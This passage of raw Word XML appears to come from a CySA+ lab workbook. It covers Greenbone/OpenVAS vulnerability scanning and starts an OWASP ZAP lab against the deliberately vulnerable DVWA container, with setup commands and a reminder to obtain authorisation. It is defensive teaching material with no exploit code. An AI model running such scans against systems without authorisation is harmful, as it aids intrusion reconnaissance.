          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Save.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This is your scope. Always confirm written authorisation before scanning anything you do not own.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — (Optional) Add credentials — credentialed scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Configuration → Credentials → New Credential</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Type: Username + SSH key (or password)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Provide a low-privileged service account on the target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A credentialed scan can read patch level, kernel version, and config files — finding 5–10× the issues of a network-only scan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Create and run a scan task</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Scans → Tasks → New Task</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Name: lab-scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Scan target: lab-target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Scan config: Full and fast (or Full and fast ultimate for credentialed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SSH/SMB credentials: select the one from Step 4 (if any)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Save, then click the green Start arrow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Scan length depends on host count and scan config — a single VM completes in 10–30 min.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Read the report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>When the task says Done, click into the report:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Severity bar — High / Medium / Low / Log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CVSS column — base score (Lab 16 covers scoring in depth)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Solution — patch ID, config change, or workaround</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CVEs — clickable to NVD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Export as PDF or CSV for inclusion in your vulnerability report (Lab 26).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Agent vs agentless distinction (CySA+ 2.1)</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fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Agentless (what you just did)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Agent-based</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Install on target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Yes (Wazuh, OSSEC, vendor)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Network coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Reachable hosts only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Anywhere agent runs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Offline / cloud hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Misses them</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Catches them</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Latency to findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Per scan window</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Continuous</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Wazuh (free, Lab 18 references it) provides an agent-based alternative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 8 — Special considerations checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Before scheduling production scans, satisfy CySA+ 2.1's six items:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Scheduling — outside business hours</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Operations — avoid printers, ICS/SCADA, brittle legacy hosts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Performance — throttle scan threads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sensitivity — exclude PCI / PHI scopes you cannot legally touch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Segmentation — scan from inside the segment, not through firewalls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Regulatory — PCI DSS Req. 11.2 mandates quarterly external scans</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 9 — Industry frameworks crosswalk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Greenbone scan policies map to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CIS Benchmarks (host hardening)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PCI DSS (network scans for cardholder environments)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ISO 27001 A.12.6 (technical vulnerability management)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>OWASP (web targets)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The right "scan config" depends on which framework you must demonstrate compliance with.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Stand up Greenbone CE / OpenVAS as a free Nessus alternative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Create a target, add credentials, run a scan, and read the report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The agent-vs-agentless trade-offs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How scan configurations align to PCI, CIS, ISO, and OWASP frameworks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to stand up Greenbone CE / OpenVAS as a free Nessus alternative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 13 — Web App Scanning with OWASP ZAP</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run OWASP ZAP against the deliberately vulnerable DVWA to surface XSS, SQLi, and CSRF findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will run OWASP ZAP against the deliberately vulnerable DVWA to surface XSS, SQLi, and CSRF findings. This is exam-blueprint CySA+ 2.2 (Web application scanners — ZAP, Burp, Arachni, Nikto).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run inside the Killercoda playground (Docker is available there): https://killercoda.com/playgrounds/scenario/ubuntu</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install ZAP CLI and Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y zaproxy docker.io</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>systemctl start docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Start the DVWA vulnerable target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>docker run -d --name dvwa -p 8080:80 vulnerables/web-dvwa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sleep 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -o /dev/null -w "%{http_code}\n" http://127.0.0.1:8080/login.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Browse to http://127.0.0.1:8080 once with credentials admin / password, then Setup → Create / Reset Database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
